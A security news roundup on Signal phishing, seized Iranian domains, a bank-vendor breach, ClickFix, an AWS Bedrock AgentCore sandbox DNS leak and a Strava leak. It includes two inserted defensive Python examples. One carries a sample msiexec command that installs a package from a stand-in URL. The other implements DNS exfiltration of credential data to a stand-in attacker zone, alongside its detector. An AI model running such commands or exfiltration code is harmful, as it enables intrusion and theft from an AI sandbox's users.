Infosec In Brief Russian intelligence-affiliated actors are posing as customer support services on business messaging applications such as Signal to compromise accounts and conduct phishing attacks, the FBI and Cybersecurity and Infrastructure Security Agency (CISA) warned last Friday.

The attacks target people of high intelligence value, like former government officials, military figures, politicians, and even journalists [We’re flattered – Ed], and have snared hundreds of individual accounts, allowing the Russians to read and send messages and to harvest data from contact lists.

The attackers send messages advising users of “suspicious activity” related to their accounts and urge them to click a link to complete a verification process. Once victims click, the attackers link their own device to the victim’s account (abusing Signal’s linked-devices feature), or take over the account completely if the user is daft enough to submit credentials or a 2FA code.

Signal remains a highly secure way to exchange messages, but not even the best end-to-end encryption can stop intruders if users invite them in: a linked device receives the plaintext just as the legitimate phone does.

The FBI and CISA offer the usual anti-phishing recommendations in their brief about the attacks.

Uncle Sam seizes four domains used for Iranian psyops

The US Department of Justice has seized domains associated with the Iran-linked group behind the cyberattack on med-tech company Stryker.

These websites, the feds say, were used to incite violence and to claim credit for disrupting the US med-tech firm’s operations. The domains were Justicehomeland[.]org, Handala-Hack[.]to, Karmabelow80[.]org and Handala-Redwanted[.]to.

The attack in question hit Stryker via a hole in Microsoft Intune, wiping data on employees’ devices. Iranian hacktivist group Handala, considered to be a front for the country’s Ministry of Intelligence and Security (MOIS), claimed credit for the Stryker attack on one of the sites, Handala-hack[.]to.

Operators of the sites also used them to doxx members of the Israel Defense Forces (IDF), and to publish claims of having stolen 851GB of confidential data from the Sanzer Hasidic Jewish community.

FBI chief Kash Patel warned in a statement: “This FBI will seek out every actor behind these cowardly death threats and cyberattacks and will bring the full force of American law enforcement down on them.”

But someone claiming to represent Handala was not impressed, posting a defiant message that states: “They may have taken down our website, but they will never take down our spirit, our resolve, or the power of truth.”

That “truth” apparently includes allegations of “witchcraft ceremonies” by the Sanzer community, according to the FBI’s statement, echoing age-old antisemitic myths used to justify violence against Jewish people.

Banking services firm warns 670,000 people of data theft

Marquis, a company that provides services to banks, has sent warning notices to more than 670,000 people telling them their information was stolen by a ransomware gang last August.

The letter [PDF] poses the terrifying question: “Who Are We, and Why Do We Have Your Information?”, before explaining that the company is a marketing provider for financial institutions.

Stolen data reportedly included sensitive information like Social Security numbers, taxpayer IDs, and account data.

In an attempt to make things right, Marquis offered victims one month’s free membership of a service from Epiq Privacy Solutions that is meant to monitor misuse of personal information and resolve identity theft. It also encouraged victims to “remain vigilant by reviewing your account statements and credit reports for any unauthorized activity over the next 12 to 24 months,” as if we all didn’t have enough on our plates already.

LeakNet discovers ClickFix social engineering

The LeakNet ransomware group has moved on from its usual tactic of buying stolen credentials and now uses the ClickFix social engineering scam, according to a new report from security shop Reliaquest.

ClickFix, which we’ve covered before, uses fake messages, delivered through compromised but legitimate websites, to convince victims to take actions such as running commands that load a rootkit or other malware.

LeakNet uses ClickFix to serve a fake “prove you aren’t a robot” dialog that asks users to open the Windows Run dialog with the Win + R shortcut and paste in a command that appears to be a link to a Cloudflare Turnstile verification page, but actually runs an msiexec command.

That command downloads and executes a cleverly disguised loader based on the (legitimate) Deno runtime, which then runs the malicious code directly in memory, helping to hide the attack from file-focused forensic scanning methods.

The technique, Reliaquest warns, could let LeakNet expand beyond its current hit rate of about three victims per month.
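The Run-dialog trick leaves two traces a defender can key on: msiexec being launched with an HTTP(S) package URL rather than a local .msi, and the pasted text being persisted in the user’s RunMRU registry key. The following detector is an added example written for this article, not Reliaquest’s or anyone else’s detection content. It runs over constructed sample events in a flat `Key=value|Key=value` layout that mimics Sysmon process-creation and registry-value records; the field names, the lure text and the domain verify-turnstile.example are assumptions for the illustration.

```python
"""Spot ClickFix-style msiexec launches in endpoint telemetry (added example)."""
import re
from dataclasses import dataclass

URL_RE = re.compile(r"https?://[^\s\"'<>|]+", re.IGNORECASE)
MSIEXEC_RE = re.compile(r"\bmsiexec(?:\.exe)?\b", re.IGNORECASE)
# /q, /qn, /qb, /quiet ...: silent install, so the victim never sees an installer UI.
QUIET_RE = re.compile(r"(?<!\S)[/-]q(?:n|b|r|f|uiet)?(?!\S)", re.IGNORECASE)
# Win+R history lives here; Windows appends "\1" to each stored entry.
RUNMRU = "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\"


@dataclass
class Finding:
    line_no: int
    source: str   # "process" (msiexec actually ran) or "runmru" (text typed into Win+R)
    url: str
    quiet: bool
    parent: str


def parse_event(line: str) -> dict:
    """Parse the constructed 'Key=value|Key=value' record format into a dict."""
    fields = {}
    for part in line.split("|"):
        if "=" in part:
            key, value = part.split("=", 1)
            fields[key.strip()] = value.strip()
    return fields


def msiexec_remote_url(cmdline: str):
    """Return the HTTP(S) package URL if cmdline runs msiexec against a network
    location, else None. Local .msi paths are deliberately ignored: that is what
    ordinary software installs look like."""
    if not MSIEXEC_RE.search(cmdline):
        return None
    match = URL_RE.search(cmdline)
    return match.group(0) if match else None


def scan(lines):
    """Run both detections over a sequence of event records."""
    findings = []
    for n, line in enumerate(lines, 1):
        ev = parse_event(line)
        kind = ev.get("EventType")
        if kind == "ProcessCreate":
            cmd = ev.get("CommandLine", "")
            url = msiexec_remote_url(cmd)
            if url:
                findings.append(Finding(n, "process", url, bool(QUIET_RE.search(cmd)),
                                        ev.get("ParentImage", "")))
        elif kind == "RegistryValueSet" and RUNMRU.lower() in ev.get("TargetObject", "").lower():
            cmd = ev.get("Details", "")
            if cmd.endswith("\\1"):          # strip the RunMRU "\1" suffix
                cmd = cmd[:-2]
            url = msiexec_remote_url(cmd)
            if url:
                findings.append(Finding(n, "runmru", url, bool(QUIET_RE.search(cmd)),
                                        "explorer.exe"))
    return findings


# Constructed sample telemetry (assumed format and values, not real captures).
SAMPLES = [
    # 1: the lure pasted into Win+R. Everything after '#' is decoration that makes
    #    the Run box look like a Cloudflare Turnstile check; msiexec ignores it.
    "EventType=ProcessCreate|Image=C:\\Windows\\System32\\msiexec.exe"
    "|ParentImage=C:\\Windows\\explorer.exe"
    "|CommandLine=msiexec /i https://verify-turnstile.example/check.msi /qn  "
    "# \u2705 I am not a robot - Cloudflare Turnstile ID: 4821",
    # 2: a normal silent install from a local file -> must not fire
    "EventType=ProcessCreate|Image=C:\\Windows\\System32\\msiexec.exe"
    "|ParentImage=C:\\Windows\\System32\\svchost.exe"
    "|CommandLine=msiexec /i C:\\Users\\alice\\Downloads\\7z2409-x64.msi /qn",
    # 3: the same lure persisted in the user's Run-dialog history
    "EventType=RegistryValueSet|TargetObject=HKU\\S-1-5-21-1-2-3-1001" + RUNMRU + "a"
    "|Details=msiexec /i https://verify-turnstile.example/check.msi /qn\\1",
    # 4: a URL on a command line that is not msiexec -> must not fire
    "EventType=ProcessCreate|Image=C:\\Windows\\System32\\notepad.exe"
    "|ParentImage=C:\\Windows\\explorer.exe"
    "|CommandLine=notepad https://example.org/notes.txt",
]

if __name__ == "__main__":
    for f in scan(SAMPLES):
        print(f"line {f.line_no}: {f.source} msiexec from {f.url} "
              f"quiet={f.quiet} parent={f.parent}")
```

The RunMRU check matters because the msiexec process is short-lived and the Deno-based loader runs the real payload in memory; the registry entry is often the only artefact left on disk that shows what the user pasted. Tune the URL rule to your environment if you legitimately deploy MSIs from an internal HTTPS share.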

The AWS sandbox that isn’t

Security outfit BeyondTrust Phantom Labs claims that the AWS Bedrock AgentCore code interpreter’s sandbox isn’t much of a sandbox at all. Although Amazon said running the service in sandbox mode blocked external access entirely, Phantom Labs claims that public DNS queries get through, which could let malevolent outsiders establish command-and-control channels and exfiltrate data.

Phantom Labs says it told AWS about the problem last September via a HackerOne report, and AWS deployed a fix in November 2025 – but later rolled it back “due to other factors.” The end result? In December, Amazon updated its documentation to recommend that customers use virtual private cloud mode if they want full control over all inbound traffic.

Amazon awarded the researcher a $100 gift card to the AWS Gear Store, Phantom Labs says.
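Why DNS egress alone is enough to leak data: a client that can resolve arbitrary names can encode bytes into subdomain labels of a zone the attacker controls, and the attacker’s authoritative server reads them back out of the query log. The script below is an added illustration written for this article, not AWS, BeyondTrust or Phantom Labs code, and it never touches AWS or the network: the “queries” are just names built in memory, alongside the resolver-side heuristic a defender would run over real query logs. The zone exfil-c2.example, the detection thresholds and the benign lookups are assumptions; the secret is AWS’s documented placeholder credential pair, not a real one.

```python
"""DNS as an exfiltration channel, and a resolver-log heuristic that spots it (added example)."""
import base64
import math
from collections import Counter, defaultdict

# Hostname labels are limited to 63 octets; base32 output uses only a-z and 2-7,
# which is valid hostname alphabet, so DNS tunnels almost always use it.
MAX_LABEL = 63


def encode_for_dns(data: bytes, base_domain: str, chunk: int = 30) -> list[str]:
    """Split data into base32 labels of the form '<seq>.<chunk>.<base_domain>'."""
    assert chunk <= MAX_LABEL
    b32 = base64.b32encode(data).decode("ascii").rstrip("=").lower()
    return [f"{i}.{b32[p:p + chunk]}.{base_domain}"
            for i, p in enumerate(range(0, len(b32), chunk))]


def decode_from_dns(names: list[str], base_domain: str) -> bytes:
    """Reassemble the payload from observed queries (what the attacker's server does)."""
    suffix = "." + base_domain
    pieces = {}
    for name in names:
        if name.endswith(suffix):
            seq, piece = name[:-len(suffix)].split(".", 1)
            pieces[int(seq)] = piece
    b32 = "".join(pieces[k] for k in sorted(pieces)).upper()
    return base64.b32decode(b32 + "=" * (-len(b32) % 8))   # restore padding


def shannon_entropy(s: str) -> float:
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def suspicious_domains(queries, min_queries=4, min_label=16, min_entropy=2.5):
    """Group queries by their last two labels and flag zones that receive many
    lookups of long, high-entropy, mostly unique subdomains. A production detector
    would use the public-suffix list to find the registrable domain; last-two-labels
    is a simplification for the example, and the thresholds are assumed defaults."""
    by_base = defaultdict(list)
    for q in queries:
        labels = q.rstrip(".").lower().split(".")
        if len(labels) >= 3:
            by_base[".".join(labels[-2:])].append(labels[:-2])
    flagged = {}
    for base, subs in by_base.items():
        longest = [max(s, key=len) for s in subs]
        hits = [l for l in longest if len(l) >= min_label and shannon_entropy(l) >= min_entropy]
        if len(hits) >= min_queries:
            flagged[base] = {
                "queries": len(subs),
                "unique_subdomains": len({".".join(s) for s in subs}),
                "mean_entropy": round(sum(shannon_entropy(l) for l in hits) / len(hits), 2),
            }
    return flagged


# Constructed sample data. The credentials are AWS's published example values.
SECRET = (b'{"AWS_ACCESS_KEY_ID":"AKIAIOSFODNN7EXAMPLE",'
          b'"AWS_SECRET_ACCESS_KEY":"wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"}')
EXFIL_DOMAIN = "exfil-c2.example"   # assumed attacker-controlled zone
BENIGN_QUERIES = [                  # assumed normal lookups from a code interpreter
    "pypi.org", "files.pythonhosted.org", "api.github.com", "cdn.jsdelivr.net",
    "sts.us-east-1.amazonaws.com", "bedrock-runtime.us-east-1.amazonaws.com",
    "sts.us-east-1.amazonaws.com",
]


def demo():
    """Encode the secret, mix it with benign traffic, then decode and detect."""
    exfil = encode_for_dns(SECRET, EXFIL_DOMAIN)
    resolver_log = BENIGN_QUERIES + exfil
    return decode_from_dns(exfil, EXFIL_DOMAIN), suspicious_domains(resolver_log)


if __name__ == "__main__":
    recovered, flagged = demo()
    print("payload survived the round trip:", recovered == SECRET)
    for base, stats in flagged.items():
        print(f"suspicious zone {base}: {stats}")
```

The point for the sandbox debate is that none of this needs an open TCP or UDP port to the internet: the sandbox only has to be allowed to ask a public resolver about names. That is why “block all external access” and “allow public DNS” are not compatible claims, and why the VPC-mode recommendation (where you control the resolver and can log or deny these queries) is the relevant mitigation.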

Strava leaks location of aircraft carrier

French newspaper Le Monde last week reported that a sailor aboard an aircraft carrier went for a seven-kilometer run on its deck – while tracking it with his smartwatch, which later uploaded the run to the exercise-tracking site Strava.

The aircraft carrier’s location was therefore visible to the world, which The Register understands is a fact navies don’t wish to reveal. France’s armed forces should know better, given that president Emmanuel Macron’s bodyguards reportedly leaked their locations with the same fitness app. – Simon Sharwood ®
